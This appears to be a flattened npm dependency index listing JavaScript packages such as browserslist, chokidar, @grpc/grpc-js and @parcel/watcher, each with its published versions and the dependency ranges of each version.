duplexify@^4.1.1 ent@^2.2.0 extend@^3.0.2 google-auth-library@^7.9.2 retry-request@^4.2.2 teeny-request@^7.0.0 3.10.0 @google-cloud/projectify@^2.0.0 @google-cloud/promisify@^2.0.0 arrify@^2.0.1 duplexify@^4.1.1 ent@^2.2.0 extend@^3.0.2 google-auth-library@^7.14.0 retry-request@^4.2.2 teeny-request@^7.0.0 @google-cloud/error-reporting 2.0.4 @google-cloud/common@^3.0.0 console-log-level@^1.4.1 2.0.5 @google-cloud/common@^3.0.0 console-log-level@^1.4.1 @google-cloud/projectify 2.1.1 @google-cloud/promisify 2.0.4 @grpc/grpc-js 1.4.0 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.1 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.2 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.3 
@grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.4 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.5 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.6 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.6.12 @grpc/proto-loader@^0.7.0 @types/node@>=12.12.47 1.7.3 @grpc/proto-loader@^0.7.0 @types/node@>=12.12.47 1.8.22 @grpc/proto-loader@^0.7.0 @types/node@>=12.12.47 1.9.15 @grpc/proto-loader@^0.7.8 @types/node@>=12.12.47 1.14.0 @grpc/proto-loader@^0.8.0 @js-sdsl/ordered-map@^4.4.2 @grpc/proto-loader 0.6.6 @types/long@^4.0.1 lodash.camelcase@^4.3.0 long@^4.0.0 protobufjs@^6.10.0 yargs@^16.1.1 0.6.13 @types/long@^4.0.1 lodash.camelcase@^4.3.0 long@^4.0.0 protobufjs@^6.11.3 yargs@^16.2.0 0.7.15 lodash.camelcase@^4.3.0 long@^5.0.0 protobufjs@^7.2.5 yargs@^17.7.2 0.8.0 lodash.camelcase@^4.3.0 long@^5.0.0 protobufjs@^7.5.3 yargs@^17.7.2 @isaacs/balanced-match 4.0.1 @isaacs/brace-expansion 5.0.0 @isaacs/balanced-match@^4.0.1 @isaacs/cliui 8.0.2 string-width@^5.1.2 KnownAs string-width-cjs|string-width@^4.2.0 strip-ansi@^7.0.1 KnownAs strip-ansi-cjs|strip-ansi@^6.0.1 wrap-ansi@^8.1.0 KnownAs wrap-ansi-cjs|wrap-ansi@^7.0.0 @jridgewell/gen-mapping 0.3.13 @jridgewell/sourcemap-codec@^1.5.0 @jridgewell/trace-mapping@^0.3.24 @jridgewell/remapping 2.3.5 @jridgewell/gen-mapping@^0.3.5 @jridgewell/trace-mapping@^0.3.24 @jridgewell/resolve-uri 3.1.2 @jridgewell/sourcemap-codec 1.5.5 @jridgewell/trace-mapping 0.3.31 @jridgewell/resolve-uri@^3.1.0 @jridgewell/sourcemap-codec@^1.4.14 @js-sdsl/ordered-map 4.4.2 @jsdoc/salty 0.2.9 lodash@^4.17.21 @parcel/watcher 2.5.1 Opt|@parcel/watcher-android-arm64@2.5.1 Opt|@parcel/watcher-darwin-arm64@2.5.1 Opt|@parcel/watcher-darwin-x64@2.5.1 Opt|@parcel/watcher-freebsd-x64@2.5.1 Opt|@parcel/watcher-linux-arm-glibc@2.5.1 Opt|@parcel/watcher-linux-arm-musl@2.5.1 Opt|@parcel/watcher-linux-arm64-glibc@2.5.1 Opt|@parcel/watcher-linux-arm64-musl@2.5.1 Opt|@parcel/watcher-linux-x64-glibc@2.5.1 Opt|@parcel/watcher-linux-x64-musl@2.5.1 
Opt|@parcel/watcher-win32-arm64@2.5.1 Opt|@parcel/watcher-win32-ia32@2.5.1 Opt|@parcel/watcher-win32-x64@2.5.1 detect-libc@^1.0.3 is-glob@^4.0.3 micromatch@^4.0.5 node-addon-api@^7.0.0 @parcel/watcher-android-arm64 2.5.1 @parcel/watcher-darwin-arm64 2.5.1 @parcel/watcher-darwin-x64 2.5.1 @parcel/watcher-freebsd-x64 2.5.1 @parcel/watcher-linux-arm-glibc 2.5.1 @parcel/watcher-linux-arm-musl 2.5.1 @parcel/watcher-linux-arm64-glibc 2.5.1 @parcel/watcher-linux-arm64-musl 2.5.1 @parcel/watcher-linux-x64-glibc 2.5.1 @parcel/watcher-linux-x64-musl 2.5.1 @parcel/watcher-win32-arm64 2.5.1 @parcel/watcher-win32-ia32 2.5.1 @parcel/watcher-win32-x64 2.5.1 @polka/url 0.5.0 @protobufjs/aspromise 1.1.2 @protobufjs/base64 1.1.2 @protobufjs/codegen 2.0.4 @protobufjs/eventemitter 1.1.0 @protobufjs/fetch 1.1.0 @protobufjs/aspromise@^1.1.1 @protobufjs/inquire@^1.1.0 @protobufjs/float 1.0.2 @protobufjs/inquire 1.1.0 @protobufjs/path 1.1.2 @protobufjs/pool 1.1.0 @protobufjs/utf8 1.1.0 @rollup/plugin-commonjs 21.0.1 @rollup/pluginutils@^3.1.0 commondir@^1.0.1 estree-walker@^2.0.1 glob@^7.1.6 is-reference@^1.2.1 magic-string@^0.25.7 resolve@^1.17.0 Scope peer|rollup@^2.38.3 21.1.0 @rollup/pluginutils@^3.1.0 commondir@^1.0.1 estree-walker@^2.0.1 glob@^7.1.6 is-reference@^1.2.1 magic-string@^0.25.7 resolve@^1.17.0 Scope peer|rollup@^2.38.3 @rollup/plugin-node-resolve 13.0.6 @rollup/pluginutils@^3.1.0 @types/resolve@1.17.1 builtin-modules@^3.1.0 deepmerge@^4.2.2 is-module@^1.0.0 resolve@^1.19.0 Scope peer|rollup@^2.42.0 13.3.0 @rollup/pluginutils@^3.1.0 @types/resolve@1.17.1 deepmerge@^4.2.2 is-builtin-module@^3.1.0 is-module@^1.0.0 resolve@^1.19.0 Scope peer|rollup@^2.42.0 @rollup/pluginutils 3.1.0 @types/estree@0.0.39 estree-walker@^1.0.1 picomatch@^2.2.2 Scope peer|rollup@^1.20.0||^2.0.0 @tootallnate/once 2.0.0 @types/caseless 0.12.5 @types/estree 0.0.39 1.0.8 @types/glob 9.0.0 glob@* @types/linkify-it 5.0.0 @types/long 4.0.1 4.0.2 @types/markdown-it 14.1.2 @types/linkify-it@^5 
@types/mdurl@^2 @types/mdurl 2.0.0 @types/node 12.6.9 16.11.6 24.10.0 undici-types@~7.16.0 @types/request 2.48.13 @types/caseless@* @types/node@* @types/tough-cookie@* form-data@^2.5.5 @types/resolve 1.17.1 @types/node@* @types/rimraf 3.0.2 @types/glob@* @types/node@* @types/tough-cookie 4.0.5 @ungap/promise-all-settled 1.1.2 @webcomponents/webcomponentsjs 2.4.0 2.8.0 abab 2.0.0 2.0.6 abort-controller 3.0.0 event-target-shim@^5.0.0 acorn 5.4.1 5.5.0 5.5.1 5.5.2 5.5.3 5.6.0 5.6.1 5.6.2 5.7.0 5.7.1 5.7.2 5.7.3 5.7.4 6.0.2 6.4.2 7.1.0 7.4.1 8.15.0 acorn-es7-plugin 1.1.7 acorn-globals 4.3.0 acorn@^6.0.1 acorn-walk@^6.0.1 4.3.4 acorn@^6.0.1 acorn-walk@^6.0.1 acorn-jsx 5.3.2 Scope peer|acorn@^6.0.0 || ^7.0.0 || ^8.0.0 acorn-walk 6.1.0 6.2.0 agent-base 4.3.0 es6-promisify@^5.0.0 6.0.2 debug@4 7.1.4 ajv 5.3.0 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.4.0 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.5.0 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.5.1 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.5.2 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 6.12.6 fast-deep-equal@^3.1.1 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.4.1 uri-js@^4.2.2 ansi-colors 3.2.3 4.1.1 4.1.3 ansi-gray 0.1.1 ansi-wrap@0.1.0 ansi-regex 2.1.1 3.0.0 3.0.1 4.1.1 5.0.1 6.2.2 ansi-styles 3.2.1 color-convert@^1.9.0 4.3.0 color-convert@^2.0.1 6.2.3 ansi-wrap 0.1.0 anymatch 3.0.3 normalize-path@^3.0.0 picomatch@^2.0.4 3.1.3 normalize-path@^3.0.0 picomatch@^2.0.4 arch 2.1.1 2.2.0 argparse 1.0.10 sprintf-js@~1.0.2 2.0.1 array-buffer-byte-length 1.0.2 call-bound@^1.0.3 is-array-buffer@^3.0.5 array-equal 1.0.0 1.0.2 array.prototype.reduce 1.0.8 call-bind@^1.0.8 call-bound@^1.0.4 define-properties@^1.2.1 es-abstract@^1.23.9 
es-array-method-boxes-properly@^1.0.0 es-errors@^1.3.0 es-object-atoms@^1.1.1 is-string@^1.1.1 arraybuffer.prototype.slice 1.0.4 array-buffer-byte-length@^1.0.1 call-bind@^1.0.8 define-properties@^1.2.1 es-abstract@^1.23.5 es-errors@^1.3.0 get-intrinsic@^1.2.6 is-array-buffer@^3.0.4 arrify 2.0.1 asn1 0.2.4 safer-buffer@~2.1.0 0.2.6 safer-buffer@~2.1.0 assert-plus 1.0.0 assertion-error 1.1.0 async-function 1.0.0 async-generator-function 1.0.0 async-limiter 1.0.1 async-transforms 1.0.9 asynckit 0.4.0 autoprefixer 9.3.0 browserslist@^4.3.2 caniuse-lite@^1.0.30000898 normalize-range@^0.1.2 num2fraction@^1.2.2 postcss@^7.0.5 postcss-value-parser@^3.3.1 9.8.8 browserslist@^4.12.0 caniuse-lite@^1.0.30001109 normalize-range@^0.1.2 num2fraction@^1.2.2 picocolors@^0.2.1 postcss@^7.0.32 postcss-value-parser@^4.1.0 10.4.21 browserslist@^4.24.4 caniuse-lite@^1.0.30001702 fraction.js@^4.3.7 normalize-range@^0.1.2 picocolors@^1.1.1 Scope peer|postcss@^8.1.0 postcss-value-parser@^4.2.0 available-typed-arrays 1.0.7 possible-typed-array-names@^1.0.0 aws-sign2 0.7.0 aws4 1.8.0 1.13.2 babel-plugin-dynamic-import-node 2.3.0 object.assign@^4.1.0 babel-plugin-func-wrap 1.1.0 babel-plugin-polyfill-corejs2 0.4.14 @babel/compat-data@^7.27.7 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-define-polyfill-provider@^0.6.5 semver@^6.3.1 babel-plugin-polyfill-corejs3 0.13.0 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-define-polyfill-provider@^0.6.5 core-js-compat@^3.43.0 babel-plugin-polyfill-regenerator 0.6.5 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-define-polyfill-provider@^0.6.5 balanced-match 1.0.0 1.0.2 base64-js 1.5.1 baseline-browser-mapping 2.8.24 2.8.25 bcrypt-pbkdf 1.0.2 tweetnacl@^0.14.3 bignumber.js 9.0.1 9.3.1 binary-extensions 2.0.0 2.3.0 bluebird 3.7.2 brace-expansion 1.1.11 balanced-match@^1.0.0 concat-map@0.0.1 1.1.12 balanced-match@^1.0.0 concat-map@0.0.1 2.0.2 balanced-match@^1.0.0 braces 3.0.2 fill-range@^7.0.1 3.0.3 
fill-range@^7.1.1 browser-process-hrtime 0.1.3 1.0.0 browser-stdout 1.3.1 browserslist 4.3.2 caniuse-lite@^1.0.30000898 electron-to-chromium@^1.3.80 node-releases@^1.0.0-alpha.14 4.3.3 caniuse-lite@^1.0.30000898 electron-to-chromium@^1.3.81 node-releases@^1.0.0-alpha.15 4.3.4 caniuse-lite@^1.0.30000899 electron-to-chromium@^1.3.82 node-releases@^1.0.1 4.3.5 caniuse-lite@^1.0.30000912 electron-to-chromium@^1.3.86 node-releases@^1.0.5 4.3.6 caniuse-lite@^1.0.30000921 electron-to-chromium@^1.3.92 node-releases@^1.1.1 4.3.7 caniuse-lite@^1.0.30000925 electron-to-chromium@^1.3.96 node-releases@^1.1.3 4.4.0 caniuse-lite@^1.0.30000928 electron-to-chromium@^1.3.100 node-releases@^1.1.3 4.4.1 caniuse-lite@^1.0.30000929 electron-to-chromium@^1.3.103 node-releases@^1.1.3 4.4.2 caniuse-lite@^1.0.30000939 electron-to-chromium@^1.3.113 node-releases@^1.1.8 4.5.0 caniuse-lite@^1.0.30000948 electron-to-chromium@^1.3.116 node-releases@^1.1.10 4.5.1 caniuse-lite@^1.0.30000949 electron-to-chromium@^1.3.116 node-releases@^1.1.11 4.5.2 caniuse-lite@^1.0.30000951 electron-to-chromium@^1.3.116 node-releases@^1.1.11 4.5.3 caniuse-lite@^1.0.30000955 electron-to-chromium@^1.3.122 node-releases@^1.1.12 4.5.4 caniuse-lite@^1.0.30000955 electron-to-chromium@^1.3.122 node-releases@^1.1.13 4.5.5 caniuse-lite@^1.0.30000960 electron-to-chromium@^1.3.124 node-releases@^1.1.14 4.5.6 caniuse-lite@^1.0.30000963 electron-to-chromium@^1.3.127 node-releases@^1.1.17 4.6.0 caniuse-lite@^1.0.30000967 electron-to-chromium@^1.3.133 node-releases@^1.1.19 4.6.1 caniuse-lite@^1.0.30000971 electron-to-chromium@^1.3.137 node-releases@^1.1.21 4.6.2 caniuse-lite@^1.0.30000974 electron-to-chromium@^1.3.150 node-releases@^1.1.23 4.6.3 caniuse-lite@^1.0.30000975 electron-to-chromium@^1.3.164 node-releases@^1.1.23 4.6.4 caniuse-lite@^1.0.30000981 electron-to-chromium@^1.3.188 node-releases@^1.1.25 4.6.5 caniuse-lite@^1.0.30000984 electron-to-chromium@^1.3.191 node-releases@^1.1.25 4.6.6 caniuse-lite@^1.0.30000984 
electron-to-chromium@^1.3.191 node-releases@^1.1.25 4.7.0 caniuse-lite@^1.0.30000989 electron-to-chromium@^1.3.247 node-releases@^1.1.29 4.7.1 caniuse-lite@^1.0.30000999 electron-to-chromium@^1.3.284 node-releases@^1.1.36 4.7.2 caniuse-lite@^1.0.30001004 electron-to-chromium@^1.3.295 node-releases@^1.1.38 4.7.3 caniuse-lite@^1.0.30001010 electron-to-chromium@^1.3.306 node-releases@^1.1.40 4.8.0 caniuse-lite@^1.0.30001012 electron-to-chromium@^1.3.317 node-releases@^1.1.41 4.8.1 caniuse-lite@^1.0.30001015 electron-to-chromium@^1.3.322 node-releases@^1.1.42 4.8.2 caniuse-lite@^1.0.30001015 electron-to-chromium@^1.3.322 node-releases@^1.1.42 4.8.3 caniuse-lite@^1.0.30001017 electron-to-chromium@^1.3.322 node-releases@^1.1.44 4.8.4 caniuse-lite@^1.0.30001021 electron-to-chromium@^1.3.338 node-releases@^1.1.46 4.8.5 caniuse-lite@^1.0.30001022 electron-to-chromium@^1.3.338 node-releases@^1.1.46 4.8.6 caniuse-lite@^1.0.30001023 electron-to-chromium@^1.3.341 node-releases@^1.1.47 4.8.7 caniuse-lite@^1.0.30001027 electron-to-chromium@^1.3.349 node-releases@^1.1.49 4.9.0 caniuse-lite@^1.0.30001030 electron-to-chromium@^1.3.361 node-releases@^1.1.50 4.9.1 caniuse-lite@^1.0.30001030 electron-to-chromium@^1.3.363 node-releases@^1.1.50 4.10.0 caniuse-lite@^1.0.30001035 electron-to-chromium@^1.3.378 node-releases@^1.1.52 pkg-up@^3.1.0 4.11.0 caniuse-lite@^1.0.30001035 electron-to-chromium@^1.3.380 node-releases@^1.1.52 pkg-up@^3.1.0 4.11.1 caniuse-lite@^1.0.30001038 electron-to-chromium@^1.3.390 node-releases@^1.1.53 pkg-up@^2.0.0 4.12.0 caniuse-lite@^1.0.30001043 electron-to-chromium@^1.3.413 node-releases@^1.1.53 pkg-up@^2.0.0 4.12.1 caniuse-lite@^1.0.30001088 electron-to-chromium@^1.3.481 escalade@^3.0.1 node-releases@^1.1.58 4.12.2 caniuse-lite@^1.0.30001088 electron-to-chromium@^1.3.483 escalade@^3.0.1 node-releases@^1.1.58 4.13.0 caniuse-lite@^1.0.30001093 electron-to-chromium@^1.3.488 escalade@^3.0.1 node-releases@^1.1.58 4.14.0 caniuse-lite@^1.0.30001111 
electron-to-chromium@^1.3.523 escalade@^3.0.2 node-releases@^1.1.60 4.14.1 caniuse-lite@^1.0.30001124 electron-to-chromium@^1.3.562 escalade@^3.0.2 node-releases@^1.1.60 4.14.2 caniuse-lite@^1.0.30001125 electron-to-chromium@^1.3.564 escalade@^3.0.2 node-releases@^1.1.61 4.14.3 caniuse-lite@^1.0.30001131 electron-to-chromium@^1.3.570 escalade@^3.1.0 node-releases@^1.1.61 4.14.4 caniuse-lite@^1.0.30001135 electron-to-chromium@^1.3.570 escalade@^3.1.0 node-releases@^1.1.61 4.14.5 caniuse-lite@^1.0.30001135 electron-to-chromium@^1.3.571 escalade@^3.1.0 node-releases@^1.1.61 4.14.6 caniuse-lite@^1.0.30001154 electron-to-chromium@^1.3.585 escalade@^3.1.1 node-releases@^1.1.65 4.14.7 caniuse-lite@^1.0.30001157 colorette@^1.2.1 electron-to-chromium@^1.3.591 escalade@^3.1.1 node-releases@^1.1.66 4.15.0 caniuse-lite@^1.0.30001164 colorette@^1.2.1 electron-to-chromium@^1.3.612 escalade@^3.1.1 node-releases@^1.1.67 4.16.0 caniuse-lite@^1.0.30001165 colorette@^1.2.1 electron-to-chromium@^1.3.621 escalade@^3.1.1 node-releases@^1.1.67 4.16.1 caniuse-lite@^1.0.30001173 colorette@^1.2.1 electron-to-chromium@^1.3.634 escalade@^3.1.1 node-releases@^1.1.69 4.16.2 caniuse-lite@^1.0.30001181 colorette@^1.2.1 electron-to-chromium@^1.3.649 escalade@^3.1.1 node-releases@^1.1.70 4.16.3 caniuse-lite@^1.0.30001181 colorette@^1.2.1 electron-to-chromium@^1.3.649 escalade@^3.1.1 node-releases@^1.1.70 4.16.4 caniuse-lite@^1.0.30001208 colorette@^1.2.2 electron-to-chromium@^1.3.712 escalade@^3.1.1 node-releases@^1.1.71 4.16.5 caniuse-lite@^1.0.30001214 colorette@^1.2.2 electron-to-chromium@^1.3.719 escalade@^3.1.1 node-releases@^1.1.71 4.16.6 caniuse-lite@^1.0.30001219 colorette@^1.2.2 electron-to-chromium@^1.3.723 escalade@^3.1.1 node-releases@^1.1.71 4.16.7 caniuse-lite@^1.0.30001248 colorette@^1.2.2 electron-to-chromium@^1.3.793 escalade@^3.1.1 node-releases@^1.1.73 4.16.8 caniuse-lite@^1.0.30001251 colorette@^1.3.0 electron-to-chromium@^1.3.811 escalade@^3.1.1 node-releases@^1.1.75 4.17.0 
caniuse-lite@^1.0.30001254 colorette@^1.3.0 electron-to-chromium@^1.3.830 escalade@^3.1.1 node-releases@^1.1.75 4.17.1 caniuse-lite@^1.0.30001259 electron-to-chromium@^1.3.846 escalade@^3.1.1 nanocolors@^0.1.5 node-releases@^1.1.76 4.17.2 caniuse-lite@^1.0.30001261 electron-to-chromium@^1.3.854 escalade@^3.1.1 nanocolors@^0.2.12 node-releases@^1.1.76 4.17.3 caniuse-lite@^1.0.30001264 electron-to-chromium@^1.3.857 escalade@^3.1.1 node-releases@^1.1.77 picocolors@^0.2.1 4.17.4 caniuse-lite@^1.0.30001265 electron-to-chromium@^1.3.867 escalade@^3.1.1 node-releases@^2.0.0 picocolors@^1.0.0 4.17.5 caniuse-lite@^1.0.30001271 electron-to-chromium@^1.3.878 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.17.6 caniuse-lite@^1.0.30001274 electron-to-chromium@^1.3.886 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.18.0 caniuse-lite@^1.0.30001280 electron-to-chromium@^1.3.896 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.18.1 caniuse-lite@^1.0.30001280 electron-to-chromium@^1.3.896 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.19.0 caniuse-lite@^1.0.30001286 electron-to-chromium@^1.4.17 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.19.1 caniuse-lite@^1.0.30001286 electron-to-chromium@^1.4.17 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.19.2 caniuse-lite@^1.0.30001312 electron-to-chromium@^1.4.71 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.19.3 caniuse-lite@^1.0.30001312 electron-to-chromium@^1.4.71 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.0 caniuse-lite@^1.0.30001313 electron-to-chromium@^1.4.76 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.1 caniuse-lite@^1.0.30001317 electron-to-chromium@^1.4.84 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.2 caniuse-lite@^1.0.30001317 electron-to-chromium@^1.4.84 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.3 caniuse-lite@^1.0.30001332 electron-to-chromium@^1.4.118 escalade@^3.1.1 node-releases@^2.0.3 
picocolors@^1.0.0 4.20.4 caniuse-lite@^1.0.30001349 electron-to-chromium@^1.4.147 escalade@^3.1.1 node-releases@^2.0.5 picocolors@^1.0.0 4.21.0 caniuse-lite@^1.0.30001358 electron-to-chromium@^1.4.164 node-releases@^2.0.5 update-browserslist-db@^1.0.0 4.21.1 caniuse-lite@^1.0.30001359 electron-to-chromium@^1.4.172 node-releases@^2.0.5 update-browserslist-db@^1.0.4 4.21.2 caniuse-lite@^1.0.30001366 electron-to-chromium@^1.4.188 node-releases@^2.0.6 update-browserslist-db@^1.0.4 4.21.3 caniuse-lite@^1.0.30001370 electron-to-chromium@^1.4.202 node-releases@^2.0.6 update-browserslist-db@^1.0.5 4.21.4 caniuse-lite@^1.0.30001400 electron-to-chromium@^1.4.251 node-releases@^2.0.6 update-browserslist-db@^1.0.9 4.21.5 caniuse-lite@^1.0.30001449 electron-to-chromium@^1.4.284 node-releases@^2.0.8 update-browserslist-db@^1.0.10 4.21.6 caniuse-lite@^1.0.30001489 electron-to-chromium@^1.4.411 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.7 caniuse-lite@^1.0.30001489 electron-to-chromium@^1.4.411 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.8 caniuse-lite@^1.0.30001502 electron-to-chromium@^1.4.428 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.9 caniuse-lite@^1.0.30001503 electron-to-chromium@^1.4.431 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.10 caniuse-lite@^1.0.30001517 electron-to-chromium@^1.4.477 node-releases@^2.0.13 update-browserslist-db@^1.0.11 4.21.11 caniuse-lite@^1.0.30001538 electron-to-chromium@^1.4.526 node-releases@^2.0.13 update-browserslist-db@^1.0.13 4.22.0 caniuse-lite@^1.0.30001539 electron-to-chromium@^1.4.530 node-releases@^2.0.13 update-browserslist-db@^1.0.13 4.22.1 caniuse-lite@^1.0.30001541 electron-to-chromium@^1.4.535 node-releases@^2.0.13 update-browserslist-db@^1.0.13 4.22.2 caniuse-lite@^1.0.30001565 electron-to-chromium@^1.4.601 node-releases@^2.0.14 update-browserslist-db@^1.0.13 4.22.3 caniuse-lite@^1.0.30001580 electron-to-chromium@^1.4.648 node-releases@^2.0.14 update-browserslist-db@^1.0.13 
4.23.0 caniuse-lite@^1.0.30001587 electron-to-chromium@^1.4.668 node-releases@^2.0.14 update-browserslist-db@^1.0.13 4.23.1 caniuse-lite@^1.0.30001629 electron-to-chromium@^1.4.796 node-releases@^2.0.14 update-browserslist-db@^1.0.16 4.23.2 caniuse-lite@^1.0.30001640 electron-to-chromium@^1.4.820 node-releases@^2.0.14 update-browserslist-db@^1.1.0 4.23.3 caniuse-lite@^1.0.30001646 electron-to-chromium@^1.5.4 node-releases@^2.0.18 update-browserslist-db@^1.1.0 4.24.0 caniuse-lite@^1.0.30001663 electron-to-chromium@^1.5.28 node-releases@^2.0.18 update-browserslist-db@^1.1.0 4.24.1 caniuse-lite@^1.0.30001669 electron-to-chromium@^1.5.41 node-releases@^2.0.18 update-browserslist-db@^1.1.1 4.24.2 caniuse-lite@^1.0.30001669 electron-to-chromium@^1.5.41 node-releases@^2.0.18 update-browserslist-db@^1.1.1 4.24.3 caniuse-lite@^1.0.30001688 electron-to-chromium@^1.5.73 node-releases@^2.0.19 update-browserslist-db@^1.1.1 4.24.4 caniuse-lite@^1.0.30001688 electron-to-chromium@^1.5.73 node-releases@^2.0.19 update-browserslist-db@^1.1.1 4.24.5 caniuse-lite@^1.0.30001716 electron-to-chromium@^1.5.149 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.0 caniuse-lite@^1.0.30001718 electron-to-chromium@^1.5.160 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.1 caniuse-lite@^1.0.30001726 electron-to-chromium@^1.5.173 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.2 caniuse-lite@^1.0.30001733 electron-to-chromium@^1.5.199 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.3 caniuse-lite@^1.0.30001735 electron-to-chromium@^1.5.204 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.4 caniuse-lite@^1.0.30001737 electron-to-chromium@^1.5.211 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.26.0 baseline-browser-mapping@^2.8.2 caniuse-lite@^1.0.30001741 electron-to-chromium@^1.5.218 node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.26.1 baseline-browser-mapping@2.8.4-beta3 caniuse-lite@^1.0.30001741 electron-to-chromium@^1.5.218 
node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.26.2 baseline-browser-mapping@^2.8.3 caniuse-lite@^1.0.30001741 electron-to-chromium@^1.5.218 node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.26.3 baseline-browser-mapping@^2.8.9 caniuse-lite@^1.0.30001746 electron-to-chromium@^1.5.227 node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.27.0 baseline-browser-mapping@^2.8.19 caniuse-lite@^1.0.30001751 electron-to-chromium@^1.5.238 node-releases@^2.0.26 update-browserslist-db@^1.1.4 buffer-crc32 0.2.13 buffer-equal-constant-time 1.0.1 buffer-from 1.1.1 1.1.2 builtin-modules 3.2.0 3.3.0 bytes 3.0.0 3.1.0 3.1.2 call-bind 1.0.8 call-bind-apply-helpers@^1.0.0 es-define-property@^1.0.0 get-intrinsic@^1.2.4 set-function-length@^1.2.2 call-bind-apply-helpers 1.0.2 es-errors@^1.3.0 function-bind@^1.1.2 call-bound 1.0.4 call-bind-apply-helpers@^1.0.2 get-intrinsic@^1.3.0 camel-case 3.0.0 no-case@^2.2.0 upper-case@^1.1.1 camelcase 4.1.0 5.3.1 6.3.0 caniuse-lite 1.0.30000898 1.0.30000989 1.0.30001753 caseless 0.12.0 catharsis 0.9.0 lodash@^4.17.15 chai 4.2.0 assertion-error@^1.1.0 check-error@^1.0.2 deep-eql@^3.0.1 get-func-name@^2.0.0 pathval@^1.1.0 type-detect@^4.0.5 4.5.0 assertion-error@^1.1.0 check-error@^1.0.3 deep-eql@^4.1.3 get-func-name@^2.0.2 loupe@^2.3.6 pathval@^1.1.1 type-detect@^4.1.0 chalk 2.4.1 ansi-styles@^3.2.1 escape-string-regexp@^1.0.5 supports-color@^5.3.0 2.4.2 ansi-styles@^3.2.1 escape-string-regexp@^1.0.5 supports-color@^5.3.0 4.1.2 ansi-styles@^4.1.0 supports-color@^7.1.0 check-error 1.0.2 1.0.3 get-func-name@^2.0.2 chokidar 3.0.2 anymatch@^3.0.1 braces@^3.0.2 Opt|fsevents@^2.0.6 fsevents@^2.0.6 glob-parent@^5.0.0 is-binary-path@^2.1.0 is-glob@^4.0.1 normalize-path@^3.0.0 readdirp@^3.1.1 3.3.0 anymatch@~3.1.1 braces@~3.0.2 Opt|fsevents@~2.1.1 fsevents@~2.1.1 glob-parent@~5.1.0 is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.2.0 3.5.1 anymatch@~3.1.1 braces@~3.0.2 Opt|fsevents@~2.3.1 fsevents@~2.3.1 glob-parent@~5.1.0 
is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.5.0 3.5.3 anymatch@~3.1.2 braces@~3.0.2 Opt|fsevents@~2.3.2 fsevents@~2.3.2 glob-parent@~5.1.2 is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.6.0 3.6.0 anymatch@~3.1.2 braces@~3.0.2 Opt|fsevents@~2.3.2 glob-parent@~5.1.2 is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.6.0 4.0.3 readdirp@^4.0.1 clean-css 4.2.1 source-map@~0.6.0 4.2.4 source-map@~0.6.0 clipboardy 1.2.3 arch@^2.1.0 execa@^0.8.0 2.1.0 arch@^2.1.1 execa@^1.0.0 2.3.0 arch@^2.1.1 execa@^1.0.0 is-wsl@^2.1.1 cliui 4.1.0 string-width@^2.1.1 strip-ansi@^4.0.0 wrap-ansi@^2.0.0 5.0.0 string-width@^3.1.0 strip-ansi@^5.2.0 wrap-ansi@^5.1.0 7.0.4 string-width@^4.2.0 strip-ansi@^6.0.0 wrap-ansi@^7.0.0 8.0.1 string-width@^4.2.0 strip-ansi@^6.0.1 wrap-ansi@^7.0.0 clone 2.1.2 clone-buffer 1.0.0 clone-stats 1.0.0 cloneable-readable 1.1.2 inherits@^2.0.1 process-nextick-args@^2.0.0 readable-stream@^2.3.5 1.1.3 inherits@^2.0.1 process-nextick-args@^2.0.0 readable-stream@^2.3.5 co 4.6.0 code-point-at 1.1.0 